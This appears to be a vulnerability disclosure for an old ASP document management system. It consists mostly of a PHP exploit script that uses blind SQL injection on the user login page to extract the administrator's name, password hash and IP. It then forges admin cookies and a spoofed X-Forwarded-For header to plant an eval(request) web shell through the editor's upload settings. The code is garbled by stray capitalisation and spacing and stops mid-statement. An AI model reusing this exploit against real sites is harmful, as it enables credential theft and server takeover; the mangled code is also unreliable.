Brief description:
The/user/UserLogin. asp file of the old Y Document Management System v2.5 sp2 has an SQL injection vulnerability, which allows malicious users to obtain any data in the database through the vulnerability. In addition, the background login is not handled properly, resulting in spoofing the management account password and administrator IP address to fool the background login.
Proof of vulnerability:
Vulnerability test exp:
<? Php
Ini_set ("max_execution_time", 0 );
Error_reporting (7 );
Function usage ()
{
Global $ argv;
Exit (
"-- ++ ============================================ ============================================+++ --".
"-- ++ =". Base64_decode ("encoding ="). "= ++ --".
"-- ++ ============================================ ============================================+++ --".
"[+] Author: My5t3ry ".
"[+] Team: http://www.t00ls.net ".
"[+] Blog: http://www.bksec.net ".
"[+] Usage: php". $ argv [0]. ""[+] Ex.: php". $ argv [0]. "localhost /".
"");
}
Function query ($ pos, $ chr, $ chs)
{
Switch ($ chs ){
Case 1:
$ Query = "admin or 1 = 1 and (select asc (mid (Admin_Name, {$ pos}, 1) from [Yao_Admin] where id = 1) = {$ chr} and 1 = 1 ";
Break;
Case 2:
$ Query = "admin or 1 = 1 and (select asc (mid (Admin_Pass, {$ pos}, 1) from [Yao_Admin] where id = 1) = {$ chr} and 1 = 1 ";
Break;
Case 3:
$ Query = "admin or 1 = 1 and (select len (Admin_Name) from [Yao_Admin] where id = 1) = {$ pos} and 1 = 1 ";
Break;
Case 4:
$ Query = "admin or 1 = 1 and (select asc (mid (Admin_IP, {$ pos}, 1) from [Yao_Admin] where id = 1) = {$ chr} and 1 = 1 ";
Break;
Case 5:
$ Query = "admin or 1 = 1 and (select len (Admin_IP) from [Yao_Admin] where id = 1) = {$ pos} and 1 = 1 ";
Break;
}
$ Query = urlencode ($ query );
Return $ query;
}
Function exploit ($ hostname, $ path, $ pos, $ chr, $ chs)
{
$ Chr = ord ($ chr );
$ Conn = fsockopen ($ hostname, 80 );
If (! $ Conn ){
Exit ("[-] No response from $ conn ");
}
$ Postdata = "Username =". query ($ pos, $ chr, $ chs). "& PassWord = aaaaaa & Submit = % B5 % C7 % C2 % BC ";
$ Message = "POST". $ path. "User/Userlogin. asp? Action = login HTTP/1.1 ";
$ Message. = "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash ,*/*";
$ Message. = "Accept-Language: zh-cn ";
$ Message. = "Content-Type: application/x-www-form-urlencoded ";
$ Message. = "Accept-Encoding: gzip, deflate ";
$ Message. = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1 )";
$ Message. = "Host: $ hostname ";
$ Message. = "Content-Length:". strlen ($ postdata )."";
$ Message. = "Cookie: ASPSESSIONIDSSCTBRDD = ILJJFNOABJJHHDMPDBAEJIGC ";
$ Message. = "Connection: Close ";
$ Message. = $ postdata;
Fputs ($ conn, $ message );
While (! Feof ($ conn ))
$ Reply. = fgets ($ conn, 1024 );
Fclose ($ conn );
Return $ reply;
}
Function crkusername ($ hostname, $ path, $ chs)
{
Global $ length, $ user;
$ Key = "abcdefghijklmnopqrstuvwxyz0123456789 ";
$ Chr = 0;
$ Pos = 1;
Echo "[+] username :";
While ($ pos <= $ length)
{
$ Response = exploit ($ hostname, $ path, $ pos, $ key [$ chr], $ chs );
Preg_match (/Set-Cookie: s ([A-Za-z] {3}) = ID =/, $ response, $ match );
If (strlen (trim ($ match [1])! = 0)
{
$ User. = $ key [$ chr];
Echo $ key [$ chr];
$ Chr = 0;
$ Pos ++;
}
Else
$ Chr ++;
}
Echo "";
}
Function crkpassword ($ hostname, $ path, $ chs)
{
Global $ pass;
$ Key = "abcdef0123456789 ";
$ Chr = 0;
$ Pos = 1;
Echo "[+] password :";
While ($ pos <= 18)
{
$ Response = exploit ($ hostname, $ path, $ pos, $ key [$ chr], $ chs );
Preg_match (/Set-Cookie: s ([A-Za-z] {3}) = ID =/, $ response, $ match );
If (strlen (trim ($ match [1])! = 0)
{
$ Pass. = $ key [$ chr];
Echo $ key [$ chr];
$ Chr = 0;
$ Pos ++;
}
Else
$ Chr ++;
}
Echo "";
}
Function lengthcolumns ($ hostname, $ path, $ chs)
{
$ Exit = 0;
$ Length = 0;
$ Pos = 1;
$ Chr = 0;
While ($ exit = 0)
{
$ Response = exploit ($ hostname, $ path, $ pos, $ chr, $ chs );
Preg_match (/Set-Cookie: s ([A-Za-z] {3}) = ID =/, $ response, $ match );
If (strlen (trim ($ match [1])! = 0)
{
$ Exit = 1;
$ Length = $ pos;
}
Else
$ Pos ++;
If ($ pos = 20)
Exit ("[+] Exploit Failed .");
}
Return $ length;
}
Function crkadminip ($ hostname, $ path, $ chs)
{
Global $ iplength, $ adminip;
$ Key = "1234567890 .";
$ Chr = 0;
$ Pos = 1;
Echo "[+] adminip :";
While ($ pos <= $ iplength)
{
$ Response = exploit ($ hostname, $ path, $ pos, $ key [$ chr], $ chs );
Preg_match (/Set-Cookie: s ([A-Za-z] {3}) = ID =/, $ response, $ match );
If (strlen (trim ($ match [1])! = 0)
{
$ Adminip. = $ key [$ chr];
Echo $ key [$ chr];
$ Chr = 0;
$ Pos ++;
}
Else
$ Chr ++;
}
Echo "";
}
Function getshell ($ hostname, $ path, $ user, $ pass, $ adminip)
{
$ Conn = fsockopen ($ hostname, 80 );
If (! $ Conn ){
Exit ("[-] No response from $ conn ");
}
$ Postdata = "d_name = user & d_initmode = EDIT & d_fixwidth = & d_skin = light1 & d_width = 500 & d_height = 300 & d_stateflag =
1 & d_sbedit =
1 & d_sbview = 1 & d_detectfromword = 1 & d_autoremote = 0 & d_showborder = 0 & d_entermode =
1 & d_areacssmode = 0 & d_memo = 500px % BF % ED % B6 % C8 % BD % E7 % C3 % E6 % CF % C2 % B5 % C4 % D7 % EE % BC % f2 % B9 % A4 % BE % DF % C0 % B8 % B0 % B4 % C5 % A5 % 2C % CA % BA % CF % D3 % DA % D3 % CA % BC % FE % CF % B5 % CD % B3 % C1 % F4 % D1 % D4 % CF % B5 % CD % B3 % B5 % C8 % D6 % BB % D0 % E8 % d7 % EE % BC % F2 % B5 % A5 % B9 % A6 % C4 % DC % B5 % C4 % D3 % A6 % D3 % C3 & d_uploadobject = 0 & d_autodir = 2 & d_allowbrowse = 0 & d_cusdirflag = 0 & d_baseurl = 1 & d_uploaddir = .. % 2 FPreviousFiles % 2F & d_basehref = & d_contentpath = & d_imageext = gif % 7 Cjpg % 7 Cjpeg % 7 Cbmp % 7C % 22% 3 Aeval % 28 request % 28% 22my % 22% 29% 29% 27 & d_imagesize = 0 & d_flashext = swf & d_flashsize = 0 & d_mediaext = rm % 7Cmp3% 7 Cwav % 7 Cmid % 7 Cmidi % 7Cra % 7 Cavi % 7 Cmpg % 7 Cmpeg % 7 Casf % 7 Casx % 7 Cwma % 7 Cmov & d_mediasize = 0 & d_fileext = rar % 7 Czip % 7 Cpdf % 7 Cdoc % 7 Cxls % 7 Cppt % 7 Cchm % 7 Chlp & d_filesize = 0 & d_remoteext = gif % 7 Cjpg % 7 Cbmp & d_remotesize = 0 & d_localext = gif % 7 Cjpg % 7 Cbmp % 7 Cwmz % 7 Cpng & d_localsize = 0 & d_sltsyobject = 0 & d_sltsyext = jpg % 7 Cjpeg & d_sltflag = 0 & d_sltminsize = 300 & d_sltoksize = 120 & d_sywzflag = 0 & d_sywzminwidth =
100 & d_sywzminheight = 100 & d_sytext = % B0 % E6 % C8 % A8 % CB % F9 % D3 % d0... & d_syfontcolor = 000000 & d_syshadowcolor = FFFFFF & d_syshadowoffset = 1 & d_syfontsize =
12 & d_syfontname = % CB % CE % CC % E5 & d_sywzposition = 1 & d_sywzpaddingh = 5 & d_sywzpaddingv = 5 & d_sywztextwidth = 66 & d_sywztextheight =
17 & d_sytpflag =
0 & d_sytpminwidth = 100 & d_sytpminheight = 100 & d_sytpposition = 1 & d_sytppaddingh = 5 & d_sytppaddingv =
5 & d_sypicpath =
& D_sytpopacity = 1 & d_sytpimagewidth = 88 & d_sytpimageheight = 31 ";
$ Message = "POST". $ path. "Admin/EditorAdmin/style. asp? Action = StyleSetSave & id = 1 HTTP/1.1 ";
$ Message. = "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash ,*/*";
$ Message. = "Accept-Language: zh-cn ";
$ Message. = "Content-Type: application/x-www-form-urlencoded ";
$ Message. = "Accept-Encoding: gzip, deflate ";
$ Message. = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1 )";
$ Message. = "Host: $ hostname ";
$ Message. = "X-FORWARDED-FOR:". $ adminip ."";
$ Message. = "Cookie: ASPSESSIONIDCADSSCQQ = OKLJGOECENDGHDLAKKIKBCAB; LaoYAdmin = UserName =". $ user. "& UserPass =". $ pass. "& UserID = 1 ";
$ Message. = "Content-Length:". strlen ($ postdata )."";
$ Message. = "Connection: Close ";
$ Message. = $ postdata;
Fputs ($ conn, $ message );
While (! Feof ($ conn ))
$ Reply. = fgets ($ conn, 1024 );
Fclose ($ conn );
Return $ reply;
}
If ($ argc! = 3)
Usage ();
$ Hostname = $ argv [1];
$ Path = $ argv [2];
Echo "[+] Len (username ):";
$ Length = lengthcolumns ($ hostname, $ path, 3 );
Echo $ length